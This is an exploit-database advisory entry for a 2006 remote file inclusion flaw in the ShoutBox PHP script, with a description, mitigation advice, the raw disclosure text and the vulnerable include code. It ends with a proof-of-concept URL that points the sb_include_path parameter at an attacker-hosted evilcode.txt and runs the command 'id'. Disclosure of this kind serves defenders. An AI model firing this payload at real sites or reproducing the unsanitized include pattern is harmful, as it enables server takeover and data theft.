ShoutBox Remote Command Execution

vendor:

ShoutBox

by:

Unknown

7.5

CVSS

HIGH

Remote Command Execution

CWE

Product Name: ShoutBox

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2006

ShoutBox Remote Command Execution

The vulnerability allows an attacker to execute arbitrary commands on the target system remotely through the ShoutBox script. By manipulating the 'sb_include_path' parameter, an attacker can include a malicious file that contains the command to be executed. This can lead to unauthorized access, data theft, and other malicious activities.

Mitigation:

The vendor should release a patch or update for the ShoutBox script to fix this vulnerability. In the meantime, users are advised to restrict access to the script and implement proper input validation and sanitization to prevent remote command execution.

Source

Exploit-DB raw data:

>>> Kurdish Security

>>> ShoutBox Remote Command Execution

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

>>> Rish : High

>>> Class : Remote

>>> Script : ShoutBox

>>> Site : http://www.knusperleicht.at

Code :


//**********************************************************
//  INCLUDE PATH
define('SB_INCLUDE_PATH', $sb_include_path);
//  INCLUDE PATH
//**********************************************************

include SB_INCLUDE_PATH.'inc/config.inc.php';
require_once SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php';
require_once SB_INCLUDE_PATH.'inc/Sb_template.php';
require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php';
require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php';
require_once SB_INCLUDE_PATH.'inc/Sb_database.php';
if(SB_INCLUDE_PATH == "")  {


http://www.site.com/[path]/sb/index.php?sb_include_path=http://[site]/evilcode.txt?&cmd=id

# milw0rm.com [2006-08-01]